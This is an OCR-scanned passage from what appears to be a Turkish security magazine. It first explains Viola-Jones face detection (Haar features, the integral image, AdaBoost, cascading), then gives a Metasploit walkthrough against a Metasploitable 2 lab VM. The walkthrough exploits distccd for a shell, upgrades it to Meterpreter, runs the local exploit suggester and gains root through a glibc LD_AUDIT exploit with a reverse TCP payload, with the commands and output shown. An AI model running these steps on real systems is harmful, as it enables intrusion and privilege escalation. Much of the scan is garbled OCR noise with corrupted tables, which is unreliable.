Görsel ve matematiksel olarak kolay ve anlaşılır olsun 
diye 4x2 piksel şeklinde ayırdım. 


Yine kolay anlaşılabilmesi için değerlerine 0 ile 1 ara- 
sında değer verdim. 0 beyazı, 1 siyahı temsil etmekte. 


Yani bir piksel 1'e ne kadar yakınsa o kadar siyah, O'a 
ne kadar yakınsa o kadar beyazdır diyebiliriz. 


Pikseller arasında bir kısmın diğer kısma göre daha 
koyu olduğunu farketmişsinizdir. Kaşlar siyah olduğu 
için değer farkı ortada. Burada açık bir şekilde haar 
kenar özelliği var. Fotoğraflarda da kesin bir fark 
göremezsiniz yani bir taraf 1 bir taraf 0 gibi değerler 
göremezsiniz. Haar özellik kabul edebilmemiz için 
ortalamalarının, farkının eşik değerinden büyük ol- 
ması gerekiyor. Örnek olarak eşik değeri 0.4 verelim. 
Fotoğraftaki kaşta bu değer 5.3 yani burada kesinlikle 
haar özellik var diyebiliriz. Tabi çalıştırdığımızda 
program direk gelip kaşa göze bakıp bunları deneme- 
yecek. Üstte anlatttığım gibi görüntünün her yerinde 
farklı boyutlarda kare kare bunları deneyip bulacak 


Mesela yanak veya saç bölümünde tarama yapıldığını 
düşünün. yine değerler hesaplanıp ortalamaları alınıp 
farkları bulunduğunda 0 - 0.1 - 0.2 değerler bulabilir. 
çünkü görülebilir bir renk farkı yok hepsi birbirine 
yakın. Örnek eşik değeri 0.4 olan algoritmamız bun- 
ları görmezden gelecektir. 


İNTEGRAL RESMİ 


Yukarıda dediğim gibi piksel piksel işlem yapıyoruz. 
200x500 piksellik bir alanda bu işlemleri yaptığı- 
mızı düşünün. 100.000 tane işlem yapmalıyız ve bir 
okadar da değer karşımıza çıkar. Tüm bu işlemleri 
yapmak çok uzun sürecek. Ama biz bunu kısa süre- 
de halletmek istiyoruz. bu yüzden integral resmini 
kullanıyoruz. 


slalslelelalelzlale 
wlapelalelelmlalala 
islalelelelelelele 


10x8 boyutunda bir resmimizin olduğunu düşünün 
ve her bir kare 1 pikseli temsil ettiğini varsayalım. 
içindeki değerler ise üstte gösterdiğim siyah-beyaz 
değerleri. burada ise işlem kolaylığı için 10 ile çarpa- 
rak O ile 10 arasında değerler aldım. Değerler temsi- 
lidir. Değerlere takılmayın. Sadece 0'a yakınlar daha 
beyaz 10'a yakınlar daha siyah. 


shalslrlalelalelala 
ejelolalolslelzlels 
EARALIRILI CJEJEI EŞ 
sisleleleğapaleğale 


elslolsfeğelefeğelı 
slefsjelefelolağale 
olapelalelelmlalale 
gününüzün 





Resim üzerinde Haar-like özellik hesaplayacağız. Fa- 
kat sadece bir bölümde değil farklı boyutlarda resmin 
her yerinde arama yapacağız. Bilgisayar için bu ağır 
bir işlem. Bu yüzden integral resmini kullanacağız 


Www.cyber-warrior.org 








integral resmini hesaplarken yapılan işlemler şunlar: 
Gördüğünüz yeşil karenin değeri solunda ve üstünde 
kalan tüm değerlerin toplamına eşit. 

yani burda 1'i, 2'yi, 5*i, 9u, 8'i, ve 0'1 topluyoruz. İn- 

tegral resmindeki o karenin değeri 25 oluyor. 


alelelrimlalnlela) 
alslelrlelnlelrlm 
EJEJES LA ESR 


lelsjrjzjelolelele| 
elelolalejslrolzjJıoj3 
zjelslalolslalolıle| 





Her kare için aynı işlemleri uyguladığınızda bu şekil- 
de bir integral resmi karşınıza çıkıyor 


evet? noldu şimdi? nerede kullanacağız bunu? 


ahelelelelelalnlele 

mjalalslerlemlmleslerlıe 

BASLAR EZ E3L) bak) 

EIA KARARINA 

| m e e ve nl 

LİN ES 3 Ri Ka 
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şimdi başta belirlediğimiz alana geri dönelim ve 
integral resminde hesaplayalım 










elelslelmlalnlala 
je lalelelelmleler)) 
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bee (er enlem) eee bee mel emlne 
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Öncelikle alanın sağ alt köşesini işaretliyoruz. Bu 
karenin değeri neydi? Solundaki ve üstünde tüm 
değerlerin toplamı. Ama bize sadece kırmızı çerçeveli 
alan lazım. O zaman çerçevenin dışını temizleme- 
miz lazım. Bunun için çerçevenin sağ üst köşesinin 
hemen üstündeki kareyi çıkartalım; 









EEEEEEEER 
Eski 
Donna 
pnnooonon 
pono 
pono zi 


clelsirlalelolelale 


Sonrasında sol alt köşenin hemen sağındaki kareyi 
çıkarmamız gerekiyor. Ama şöyle bir sıkıntı doğuyor. 
farkettiyseniz çerçevenin sol üst kısmının sol çapra- 
zını 2 kere çıkartıyoruz. burada hata vericektir. Hem 
alttaki kareden dolayı hemde sağ üst taraftaki kare- 
den dolayı üst üste çıkarttık. Bu hatayı gidermek için 
o kısmı tekrardan eklemeliyiz; 


ENENEN ES EZE EZEN EEN 
KARNE EI EZ KARI KI EZE 
Öğ ha e el eks cs bn be 
KIRILIR CA IRK RE 


pas | m | bn ee be Jae 
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Daha sonrasında sol alt köşenin hemen solundaki 
kareyi çıkartıp belirlediğimiz alandaki sayıların top- 
lamını buluyoruz 


Yani şöyle bir görüntü elde ettik 
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Bu sayıları tek tek toplamaya çalışsaydık 11 işlem 
yapacaktık. Ama integral resmi sayesinde bu 3e indi. 
Ve bilgisayarı rahatlatmış olduk. Boyutu ne olursa 
olsun farketmiyor. Tek yapmamız gereken bu 3 işlem. 
Yuvarlak bir bölümü hesaplayamayız. Haar-like 
özellikleri dikdörtgenlerden oluşuyor. Bu yüzden 
özellikleri hesaplamak için bu yöntemi kullanabiliriz. 
Viola-Jones algoritmasını güçlü kılan özelliklerden 
biri de integral resmidir. 

Bu kısma kadar yüzün nasıl tanınacağını gördük. 
Şimdi nasıl eğitileceğine bakalım 


lalslelalalalrisle 

ejofalelslolzlı)s 
lella lo a KEZ 
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2.ADIM: Eğitim 


Eğitirken Haar-like özelliklere göre eğitiyoruz. 

Bu özelliklerden hangileriyle yüz üzerinde sık sık 
karşılaşıyoruz?. Mesela biz göz için çizgi özelliğini 
görebiliyoruz fakat bilgisayar için bu resim sayılardan 
başka bir şey değil. Hangi özellikler bizim için önem- 
liyse bunları bilgisayara anlatmamız gerekiyor... 


mazi 


. 2 İm 
. 
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Algoritma önce resmi 24x24 boyutuna küçültecek. 
Sonra resimde özellikleri aramaya başlayacak. han- 
gi özellikler yüzde daha çok bulunuyor öğrenecek. 
Özeelliklerin boyutları değişebilir demiştik. Burada 
da resmi küçültmemizin sebebi resim büyüdükçe 
işlem sayısı artacağı için hem eğitimi zorlaştıracak- 
tır hemde kısa sürmeyecektir. Bu yüzden küçültüp 


sınırlı sayıda ama önemli özelliklerle işlem yapıyoruz. 


Resim küçültme işlemi sadece eğitim esnasında yapı- 


lan bir işlem. Gerçek resim üzerinde bu uygulanmaz. 
Eğitimin genel mantığı bu şekilde. 


Eğitim için tek resim yetmez. Çünkü 1 resimden 
yanlış şeyler öğrenebilir. Bu yüzden yüzlerce binlerce 
resim üzerinde eğitim yapmamız gerekiyor. 





Algoritmaya önden yüzü gözüken resimleri verdi- 
gimizde algoritma nerede ne tür özellikller araması 
gerekitiğini öğrenecek. Mesela bir özellik keşfettiği- 
ğinde ve bu özellik resimlerde sık sık karşılaşılan bir 
özellikse bu özellik yüzde olan bir özellik OLABİLİR. 
diyor. Tabi eğitim için bu kadar resmin yetmez yüz- 
lerce binlerce resim gerekiyor. Daha fazla resim için 
resimlerin tersini alarak bir o kadar daha resim elde 
etmiş oluruz. Hani yukarıda göstermiştim ya integ- 
ral resmini. Eğer biz resmin tersini alırsak verilerde 
değişir. Böylelikle resim sayımızı da arttırmış oluruz 
Şöyle bir durum daha var. Algoritma bu özellikleri 
sadece yüz üzerinde bulması gerekiyor. 

O yüzden resimlerin içinde bir o kadar yüz olmayan 
resimler de olmalı. Böylelikle algoritma hangi özel- 
likler sadece yüzde ait özellikler öğrenmiş oluyor. Bir 
de hangi resimlerde yüz olduğunu hangi resimlerde 
yüz olmadığını algoritmaya göstermemiz gerekiyor ki 
nasıl çalışacağını bilsin kerata. 


Adaptive Boosting (Adaboost) 
Boosting, bir çok zayıf öğreniciyi (weak learner) bir 


araya getirerek bir güçlü öğrenici (strong learner) 
oluşturmak anlamına gelir.(alıntı) 





Biz özellikleri alıp bir sınıflandırıcı içerisine yerleşti- 
receğiz. Formulü bu şekilde tanımlayabiliriz 


fe) zaf) * a>f7(X) * a3f5(4)*... 


Burada f(x) sınıflandırıcımız f1,12,13 özelliklerimiz 
al,a2,a3 katsayılarımız. 

örnek olarak burundaki özelliği ekleyelim. ışığın 
etkisiyle burun kısmı yanlarına göre daha açıktır. kaş 
özelliği ekleyelim. bir de göz özelliğini alalım. 


M mmm | 
fe) zaşfı(x) * a>f7(X) * a3f (e)... 


Tek tek bu özelliklere zayıf sınıflandırıcı deniyor fx 
ise güçlü sınıflandırıcıdır. Yani hepsinin bir arada bu- 
lunması onları güçlü kılıyor. Mesela bir özelliğin 9060 
başarı oranı olduğunu düşünelim. 9660 başarı oranı 
olan birkaç bin özellik daha eklersek çok daha güçlü 
bir sınıflandırıcı elde edebiliriz. bu da genel başarı 
oranını arttıracaktır. yani zayıflar birleşerek güçlü ol- 
dular. Buna topluluk metodu deniliyor. Topluluktan 
güç alarak başarılı bir şekilde sınıflandırma yapabili- 
yoruz. Adaboost'un da mantığı budur. 


Biz hem bilgisayarı yormamak hemde hızlı olmak 
için az ama öz özellikler kullanacağız. 





Algorimada | tane zayıf sınırlandırıcı varsa; 
Sadece bu özelliği arıyorsak ve resimde varsa o kısım 
kesinlikle yüzdür. Diyip işaretliyor. 








www.cyber-warrior.org 





Algoritmada 2 tane zayıf sınırlandırıcı varsa; 
Resimde böyle bir burun özelliği varsa ve aynı za- 
manda böyle bir kaş özelliği varsa burada yüz vardır. 
Diyip işaretliyor 























Algoritmada 3 tane zayıf sınırlandırıcı varsa; 
Resimde böyle bir burun özelliği varsa ve aynı za- 
manda böyle bir kaş özelliği ve göz özelliği varsa 
burada yüz vardır. Diyip işaretliyor 


Bu şekilde özelliklerimiz arttıkça güçlü sınıflandı- 
rıcımız tam olarak yüzün tarifini algoritmik olarak 


yapabilecek. 


Cascading 





İCWBEST GÜNCEL BİLİM VE TEKNOLOJİ DERGİSİ 


NOR SOON 
vd 








Pencereyi Reddet 


Şimdi Viola-Jones algoritmasında işlemleri hızlandır- 
mak için başka bir yöntemi inceleyeceğiz. Bu yönte- 
min adı Cascading 

Hatırlarsanız resmin üstüne bir pencere yerleştirip 
kare kare arıyorduk. Bu yöntem de şöyle çalışıyor. Bu 
pencerede en önemli özelliğe bakıyoruz. Eğer pen- 
cere içerisinde bu özellik yoksa direk bu pencereyi 
geçiyoruz. Diğer özelliklere bakmıyoruz. Yani göz 
yoksa yüz de yoktur diyoruz. Eğer özellik pencere 
içinde varsa 2. özelliğe geçiyoruz. Bu sefer pencere 
içerisinde 2. özelliği arıyoruz. Yoksa burada yüz yok 
diyip geçiyoruz. eğer varsa 3. özelliğe geçiyoruz. Yine 
pencere içinde 3. özellik de varsa bu şekilde devam 
ediyor. Eğer yoksa burada yüz yoktur diyip geçiyoruz 


Diğer yöntemlerle Cascading yöntemini beraber 
kullandığınızda bilgisayar yükü oldukça azalıyor. 
Bu yöntemlerle vioala-jones algoritması çok daha 
hızlanıyor. 


İşin teori kısmı bu kadar. Konuyu olabildiğince basit 
anlatmaya çalıştım. Bu bölüm size sıkıcı gelmiş olabi- 
lir. Ama diğer bölümde kod yazarak video üzerinde 
yüz tanıma yapacağız. 2. bölüm ya yarın ya da ertesi 


gün gelecek. 























Metasploit Local Exploit 
Suggester 


Bu Egitimde Neler Ögreneceksiniz 

Bu egitimde, hedefte bir shell elde etmek icin nasil 
Metasploiti kullanacagimizi. 

Bu egitimde, shell bir Meterpreter oturumunu 
yükseltmeyi ve sistemde root elde etmek icin yerel 
aciklardan yararlanma önerici(Suggester) modülünü 
kullanmayi. 


Baslayalim. 

Hedef sistemde bir shell almayi basardik, ancak root 
yetkisine sahip degilsiniz peki ne yapmaliyiz? Ayrı- 
calık yükseltme geniş bir alandır ve bir saldırının en 
ödüllendirici ancak sinir bozucu aşamalarından biri 
olabilir. Manuel rotaya gidebiliriz, ancak her zaman 
olduğu gibi, Metasploit, yerel ayrıcalık yükseltmeyi 
gerçekleştirmeyi ve exploit suggester modul ile root 
almayı kolaylaştırır. 


Islemlerimi Kali Linux 2020.3 yürütecegim. 
Saldiracagim Makina Ise Metasploitable 2 


Fa Metasploit (Running! - Oracle VM VirtualBox — LI Xx 


File Machine View Input Devices Help 

* Starting deferred execution scheduler atd 
* SŞtarting periodic command scheduler crond 
* Starting Tomcat servlet engine tomcat5.5 

» Starting web server apache2 

# Running local boot scripts (/etc/rc.local) 
1wohup: appending output to nohup.out' 

hohup: appending output to nohup.out' 


arning: Never expose this UM to an untrusted netyork! 
.ontact: msfdevlatlmetasploit.com 


ogin with msfadmin/msfadmin to get started 





etasploitable login: 


© 05 (> li GİSİ sTRG-RECHTS 


Yapmamiz gereken ilk sey, hedef sistemde düsük 
ayricalikli bir oturum acmak. Bunu metasploit ile 
rahatlikla yapabiliriz. 


Terminale diyerek baslatin. 


root(©Darkness-CW: - (on Darkness-CW) 


File Actions Edit View Help 


:“# msfconsole 


METASPLOIT by Rapıld7 


EXPLOIT 


PAYLOAD 


İ .0.21-1 1 
84 exploits - 1126 auxiliary - 354 post 1 
2 payloads - 45 encoders - 10 nops 1 
evasion 1 


0 
9 


| e e 


2 
5 
7 


Metasploit tip: Writing a custom module? After editing your 
module, why not try the reload command 


msf6 > İl 





Metasploitable, program derlemesini birden çok 
sisteme dağıtmak için kullanılan ve birleşik işlemci 
gücünden yararlanarak işleri hızlandıran distccd adlı 
savunmasız bir hizmet içerir. Ne yazık ki, programın 
bu sürümü uzaktaki bir saldırganın sunucuda rasgele 
komutlar yürütmesine izin veriyor. 


İstismar arama komutu: 


26 








root(©Darkness-CW: - (on Darkness-CW) 


File Actions Edit View Help 


msf6 > search distccd 


Matching Modules 


# Name Disclosure Date Rank Check 


Description 


0 exploit/unix/misc/distcc exec 2002-02-01 excellent Yes DistCC Daem 


on Command Execution 


Interact with a module by name or index. For example info 0, 
1X/m1sc/dısicc exec 


msf6 > İ 


Modülü yüklemek için use yazın ve ardından mo- 
dülün tam yolunu yazın: 


Daha sonra bizden hangi ayarlari istiyor ona bir ba- 
kalim, komutumuz: 


msf6 > use exploit/unix/misc/distcc exec 
msf6 exploit( ) > options 


Module options (exploit/unix/misc/distcc exec): 


Name Current Setting Reguired Description 
RHOSTS yes 
hosts file with syntax 'file:<path>' 


RPORT 3632 yes 


The target host(s), range CIDR identifier, or 


The target port (TCP) 


Exploit target: 
Id Name 


0 Automatic Target 


msf6 exploit( 





Uzaktan baglanti noktasi (RPORT) zaten varsayilan 
baglanti noktasi oldugu icin sadece hedef sistemin ip 
adresi gerekiyor. Hedefin uygun ip adresini belirtmek 
icin set komutunu kullanin. 


msf6 exploit( ) > set rhost 192.168.Xxx.XxXX 
rhost > 192.168.XX.xxX 
msf6 exploit( ) > options 

Module options (exploit/unix/misc/distcc exec): 


Name Current Setting Reguired Description 
RHOSTS 192.168.XX.XXxX yes 
hosts file with syntax 'file:<path>' 


RPORT 3632 yes 


The target host(s), range CIDR identifier, or 


The target port (TCP) 


Exploit target: 


Name 


Automatic Target 


msf6 exploit( 





Ip adresini girdikten sonra tekrar options diyerek 
seceneklerde ipimiz kayitli kalmismi diye baktik. 


Exploit imize uygun payload secmemiz icin komutu- 
muz: 





| 





msf6 exploit( ) > show payloads 


Compatible Payloads 


Name Disclosure Date Rank Check Description 
normal 
normal 
normal 
normal 
normal 
normal 
normal 
normal 
normal 


cmd/unix/bind perl 
cmd/unix/bind perl ipv6 
cmd/unix/bind ruby 
cmd/unix/bind ruby ipv6 
cmd/unix/generic 
cmd/unix/reverse 
cmd/unix/reverse bash 
cmd/unix/reverse bash telnet ssl 
cmd/unix/reverse openssl 


Unix Command Shell, Bind TCP (via Perl) 

Unix Command Shell, Bind ICP (via perl) IPv6 

Unix Command Shell, Bind TCP (via Ruby) 

Unix Command Shell, Bind ICP (via Ruby) IPv6 

Unix Command, Generic Command Execution 

Unix Command Shell, Double Reverse TCP (telnet) 
Unix Command Shell, Reverse ICP (/dev/tcp) 

Unix Command Shell, Reverse ICP SSL (telnet) 

Unix Command Shell, Double Reverse ICP SSL (opens 


normal 
normal 


cmd/unix/reverse perl 
cmd/unix/reverse perl ssl 


Unix Command Shell, Reverse ICP (via Perl) 

Unix Command Shell, Reverse ICP SSL (via perl) 
Unix Command Shell, Reverse ICP (via Ruby) 

Unix Command Shell, Reverse TCP SSL (via Ruby) 
Unix Command Shell, Double Reverse ICP SSL (telne 


normal 
normal 
normal 


cmd/unix/reverse ruby 
2 cmd/unix/reverse ruby ssl 
3 cmd/unix/reverse ssl double telnet 


)>İ 


msf6 exploit 


Ben uygun olan 2. olan payloadi seciyorum: 


msf6 exploit( ) > set payload cmd/unix/bind ruby 
payload > cmd/unix/bind ruby 


msf6 exploit( )>| 





Şimdi istismarı başlatmaya hazırız. Exploit için 
komutunu kullanın. 


msf6 exploit ) > set payload cmd/unix/bind ruby 
payload > cmd/unix/bind ruby 
msf6 exploit( ) > run 
192.168.XX.xxx:3632 — 
192.168.xx.XXX:3632 — 
192.168.xx.xxx:3632 - stderr: Lp Gol ei 

Started bind TCP handler against 192.168.xx.xxx:4444 

Command shell session 1 opened (0.0.0.0:0 > 192.168.XxX.xxx:4444) at 2021-01-31 11:55:15 -0500 


stderr: -e:l:in initialize': Address already in use - 
stderr: from -e:1l:in 'new' 


bind(2) (Errno :: EADDRINUSE ) 


uname -a 
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux 





Basarili bir giris yaptik 
kinda bilgi verdi. 


diyerek sistem hak- 


Terminalde Background Olmak 

Hala temel komut kabuğundayken, oturumu arka 
plana çıkarmak için Ctri-Z tuşlarına basın . Y tusuna 
basin. 


4 
Background session 1? (y/NJ y 


msf6 exploit( )>Ş 





Backgroundda Calistirdigimiz Tüm Otumlari Geri 
Dönmek 

Arka planda çalıştırdığımız tüm oturumları sessions 
komutuyla aratiyoruz. 


msf6 exploit( 
msf6 exploit 


Active sessions 


Id Name Type Information Connection 


1 shell cmd/unix 0.0.0.0:0 > 192.168.xx.xxx:4444 (192.168.xXx.XxXX) 
msf6 exploit( y> 
Stopping exploit/multi/handler 





Normal bir kabuğu Meterpreter oturumuna yükselt- 
menin en kolay yolu, yükseltme yapmak için -u işare- 
tini ve ardından oturum numarasını kullanmaktır. 


msf6 exploit( ) > sessions -u 1 
Executing 'post/multi/manage/shell to meterpreter' on session(s): (1) 


Upgrading session ID: 1 


Starting exploit/multi/handler 

Started reverse ICP handler on 0.0.0.0:4433 
sessions 

Command stager progress: 100.00X (769/769 bytes) 





İstenilen oturumda -i bayrağını kullanarak yeni Me- 
terpreter oturumumuzla etkileşim kurabiliriz . 





msf6 exploit( )> 
Stopping exploit/multi/handler 
sessions -i 1 
Starting interaction with 1... 


RIXHUROABOUTThOosPerNaVCGuveOXmTg 
Is 
4615.jsvc up 





Asama 3: Exploit Suggesterı Çalıştır 

Metasploit post modülleri, doğrudan oturumda 
değil, arka planda çalışan bir oturumda çalışır, bu ne- 
denle arka plan oturumu 2 (Meterpreter kabuğumuz) 
ve ana komuta geri dönülür. Daha sonra aşağıdaki 
komutu kullanarak local exploit önericisini yani (su- 


ggester) yükleyebiliriz. 


Ana meterpreter ekranina döndükten sonra uygun 
olan suggester aratalim komutumuz: 


Background session 1? (y/NJI y 


msf6 exploit( ) > search suggester 


ur felıbiıleği Tefek 


# Name 


Disclosure Date Rank Check Description 


0 post/multi/recon/local exploit Süggester normal No Multi Recon Local Exploit Süggester 


Interact with a module by name or index. For example info 0, use © r use post/multi/recon/local exploit suggester 


msf6 exploit( a | 


Zaten sadece 1 tane var su komutu kullanarak sece- 
lim: 


Bizden istenilen secenekleri görelim: options 
Seçeneklere baktığımızda, sadece bunu çalıştırmak 
istediğimiz oturumu(session) belirtmemiz gerekiyor. 
Oturumu, Meterpreter kabuğumuz olan I numaraya 
ayarlamanız yeterlidir. 


Interact with a module by name or index. For example info 0, use 0 or 
msf6 exploit( ) > 
msf6 exploit( ) > se post/multi/recon/local exploit suggester 
Unknown command: se. 
msf6 exploit( ) > use post/multi/recon/local exploit suggester 
msf6 post( ) > options 


Module options (post/multi/recon/local exploit suggester): 
Name Current Setting Reguired Description 


SESSTION yes 
SHOWDESCRIPTION false yes 


The session to run this module on 

Displays a detailed description for the available exploits 

msf6 post( ) > set SESSION 1 

SESSION > 1 

msf6 post( ) > options 

Module options (post/multi/recon/local exploit suggester): 
Name Current Setting Reguired Description 


SESSTION 1 yes 
SHOWDESCRIPTION false yes 


The session to run this module on 
Displays a detailed description for the available exploits 


msf6 post( )>İ 


Ve başlatmak için run yazın. 


msf6 post ) > run 


192.168.XxX.XXX 
192.168.XxX.XXX 
(*1 192.168.xx.xxx 


Collecting local exploits for cmd/unix... 
10 exploit checks are being tried... 
- exploit/openbsd/local/dynamic loader chpass privesc: The service is running, but could not be validated 


(*1 192.168.xx.xxx —- exploit/unix/local/setuid nmap: The target is vulnerable. 
Post module execution completed 
msf6 post( )>| 


Modülün bir dizi yerel istismarı kontrol ettiğini ve 
uygun görünen birkaçını döndürdüğünü görebiliriz. 


Asama 4: Kök Al 


Yapmamız gereken son şey, sisteme kök salmak için 
bu açıklardan birini kullanmak. Bize önerilen ilkini 
deneyeceğiz. Bu istismar, LD AUDIT ortam değişke- 














ninin, sonuçta kök ayrıcalıklarıyla çalışan bir setuid 
nesnesinin yüklenmesine izin verdiği glibc dinamik 
bağlayıcıdaki bir güvenlik açığından yararlanır. 


İstismar arama komutu: search glibc 
Ben uygun 2. Exploit olan aciktan yararlanacagim 
komutumuz: 


msf6 post ) > search glibc 


Matching Modules 


# Name Disclosure Date Rank 


Description 


0 auxiliary/gather/gnap backtrace admin hash 2017-01-31 normal ONAP NAS/NVR Administrator Ha 
sh Disclosure 

1 auxiliary/scanner/http/wordpress ghost scanner normal 
ability Scanner 

exploit/linux/local/glibc Id audit dso load priv e scjiğeğunKuğıKoğsi excellent 

Load Privilege Escalation 

3 exploit/linux/local/gİĞBE origin expansion priv esc 
vilege Escalation 

4 exploit/linux/local/giğbe realpath priv esc 
Escalation 

5 exploit/linux/local/libuser roothelper priv esc 
Escalation 

6 exploit/linux/local/netfilter priv esc ipv4 
Privilege Escalation 

7 exploit/linux/smtp/exim gethostbyname bof 
me) Buffer Overflow 


WordPress XMLRPC GHOST Vulner 
giib& LD AUDIT Arbitrary DSO 
2010-10-18 excellent BİDE '$ORIGIN' Expansion Pri 
2018-01-16 normal gib 'realpath()' Privilege 
2015-07-24 Libuser roothelper Privilege 
2016-06-03 Linux Kernel 4.6.3 Netfilter 
2015-01-27 Exim GHOST (gİbE gethostbyna 


Interact with a module by name or index. For example info 7, use 7 or use exploit/li 


msf6 post ) > use exploit/linux/local/glibc Id audit dso load priv esc 
No payload configured, defaulting to linux/x64/meterpreter/reverse tcp 
msf6 exploit( a | 


Seceneklere bir göz atalim, komutumuz: options 
Seçeneklere baktığımızda, yalnızca oturumu yeniden 
ayarlamamız gerekiyor - varsayılan yürütülebilir yol 
şimdilik çalışacak. 

Oturumu eskisi gibi ayarlayın: 


msf6 exploit( ) > options Ni 
Module options (exploit/linux/local/glibc ld audit dso load priv esc): 
Name Current Setting Reguired Description 


The session to run this module on. 
Path to a SUID executable 


SESSTION yes 

SUID EXECUTABLE /bin/ping yes 
Payload options (linux/x64/meterpreter/reverse tcp): 

Name Current Setting Reguired Description 


The listen address (an interface may be specified) 
The listen port 


LHOST 192.168.43.74 yes 

LPORT 4444 yes 
Exploit target: 

Id Name 


0 Automatic 


msf6 exploit( > set SESSION 1 
SESSION > 1 


msf6 exploit 





Ayrıca , istismar tamamlandığında bize başka bir Me- 
terpreter oturumu vermek için yükü ayarlayabiliriz : 


msf6 exploit( ) > show payloads 


Compatible Payloads 


Name Disclosure Date Rank Check Description 


generic/custom normal No 
generic/debug trap normal No 
generic/shell bind tcp normal No Generic Command Shell, Bind TCP Inline 
generic/shell reverse tcp normal No Generic Command Shell, Reverse ICP Inline 
generic/tight loop normal No Generic x86 Tight Loop 

linux/x64/exec normal No Linux Execute Command 
linux/x64/meterpreter/bind tcp normal No Linux Mettle x64, Bind TCP Stager 
linux/x64/meterpreter/reverse tcp normal No Linux Mettle x64, Reverse TCP Stager 
linux/x64/meterpreter reverse http normal No Linux Meterpreter, Reverse HTTP Inline 
linux/x64/meterpreter reverse https normal No Linux Meterpreter, Reverse HTTPS Inline 
linux/x64/meterpreter reverse tcp normal No Linux Meterpreter, Reverse ICP Inline 
linux/x64/shell/bind tcp normal No Linux Command Shell, Bind TCP Stager 
linux/x64/shell/reverse tcp normal No Linux Command Shell, Reverse TCP Stager 
linux/x64/shell bind ipv6 tcp normal No Linux x64 Command Shell, Bind TCP Inline (I 


Custom Payload 
Generic x86 Debug Trap 


UFBUNPOLI 


linux/x64/shell bind tcp normal No Linux Command Shell, Bind TCP Inline 
linux/x64/shell bind tcp random port normal No Linux Command Shell, Bind ICP Random Port I | 


linux/x64/shell reverse ipv6 tcp normal No Linux x64 Command Shell, Reverse TCP Inline 


17 linux/x64/shell reverse tcp normal No Linux Command Shell, Reverse ICP Inline 
18 linux/x86/chmod normal No Linux Chmod 
19 linux/x86/exec normal No Linux Execute Command 


Ben uygun 27. Olan payloadi seciyorum, komutu- 
MUZ: 





















































Linux/x86/meterpreter/reverse tcp normal Linux Mettle x86, Reverse ICP Stager 


6/meterprete everse tcp uuid normal Linux Mettle x86, Reverse ICP Stager 

86/meterpreter reverse http normal Linux Meterpreter, Reverse HTTP Inline 
linux/x86/meterpreter reverse https normal Linux Meterpreter, Reverse HTTPS Inline 
linux/x86/meterpreter reverse tcp normal Linux Meterpreter, Reverse ICP Inline 
linux/x86/metsvc bind tcp normal Linux Meterpreter Service, Bind ICP 
linux/x86/metsvc reverse tcp normal Linux Meterpreter Service, Reverse ICP Inli 


e 
WNPB SOW 


34 linux/x86/read file normal Linux Read File 

35 linux/x86/shell/bind ipv6 tcp normal Linux Command Shell, Bind IPv6 TCP Stager ( 
Linux x86) 

36 linux/x86/shell/bind ipv6 tcp uuid normal Linux Command Shell, Bind IPv6 TCP Stager w 
ith UUID Support (Linux x86) 

37 linux/x86/shell/bind nonx tcp normal Linux Command Shell, Bind TCP Stager 


38 linux/x86/shell/bind tcp normal Linux Command Shell, Bind TCP Stager (Linux 


/x86/shell/ d tcp uuid normal Linux Command Shell, B TCP Stager with U 

UID Support ( ux x86) 

40 linux/x86/shell/reverse ipv6 tcp normal Linux Command Shell, Reverse TCP Stager (IP 
v6) 

41 linux/x86/shell/reverse nonx tcp normal Linux Command Shell, Reverse TCP Stager 

42 inux 6/shell/reverse tcp normal Linux Command Shell, Reverse TCP Stager 

43 x86/shell/reverse tcp uuid normal Linux Command Shell, Reverse TCP Stager 

44 x86/shell bind ipv6 tcp normal Linux Command Shell, Bind TCP Inline (IPv6) 

45 linux/x86/shell bind tcp normal Linux Command Shell, Bind TCP Inline 

46 linux/x86/shell bind tcp random port normal Linux Command Shell, Bind ICP Random Port I 
nline 

47 linux/x86/shell reverse tcp normal Linux Command Shell, Reverse ICP Inline 

48 linux/x86/shell reverse tcp ipv6 normal Linux Command Shell, Reverse ICP Inline (IP 
v6) 


msf6 exploit( ) > set payload linux/x86/meterpreter/reverse tcp 
payload > linux/x86/meterpreter/reverse tcp 
msf6 exploit Da | 





Bize sunulan seceneklere bakalim: options 
Bizden local ip ve port umuzu girmemizi istiyor 
benim ip dogru oldugu icin girmedim sizde degilse 


farkli bir terminalde ifconfig yazarak ipinizi ögrene- 
bilirsiniz. 


msf6 exploit( ) > options 
Module options (exploit/linux/local/glibc Id audit dso load priv esc): 
Name Current Setting Reguired Description 
SESSTION a? yes The session to run this module on. 
SUID EXECUTABLE /bin/ping yes Path to a SUID executable 
Payload options (linux/x86/meterpreter/reverse tcp): 
Name Current Setting Reguired Description 
LHOST 192.168.xx.xx yes The listen address (an interface may be specified) 
LPORT 4444 yes The listen port 
Exploit target: 
Id Name 


0 Automatic 


msf6 exploit( ) > set lport 4321 
Iport > 4321 
msf6 exploit( 





Son olarak, istismarı başlatmak için run yazın. 
Artık hedefte yeni bir Meterpreter oturumumuz var. 


msf6 exploit( ) > set lport 4321 
Iport > 432 
msf6 exploit( ) > run 


SESSTION may not be compatible with this module. 

Started reverse TCP handler on 192.168.43.74:4321 

The target appears to be vulnerable 

Using target: Linux x86 

Writing '/tmp/.fsu2eW' (1271 bytes) 

Writing '/tmp/.G9Agg02' (276 bytes) 

Writing '/tmp/.c1CfZ8SYO' (207 bytes) 

Launching exploit... 

Sending stage (976712 bytes) to 192.168.xx.XXX 

Meterpreter session 2 opened (192.168.xx.xx:4321 > 192.168.xx.xxx:60748) at 2021-02-01 07:38:12 -0500 


meterpreter > Is 
Listin /tmp 


Mode Size Last modified Name 
100755/rwx x 276 2021-02-01 07: 
41777 İTWXTWXTWX 4096 2021-02-01 06: 
100444/r— 11 2021-02-01 06: 
41777/TWXTWXTWX 4096 2021-02-01 06: 
100755/rwxr-xr-x 207 2021-02-01 07: 
100755/rwxr-xr-x 1271 2021-02-01 07: 
100600/ru—— O 2021-02-01 06: 


.G9Agg02 
.İCE-unix 
.X0-lock 
.X11-unix 
.C1CfZ8SYO 
.fsu2eW 
4572.jsvc up 


WWW UY 
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meterpret 





Kök erişimi elde ettiğimizi doğrulamak için bir kabu- 


ğa düşebiliriz: shell 


meterpreter > shell 
Process 5144 created. 
Channel 1 created. 

id 


uid-O0(root) gid-0(root) groups-1(daemon) 
uname -a 
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 1686 GNU/Linux 





> 


dli bilişim hukuksal sayısal finansal mu- 
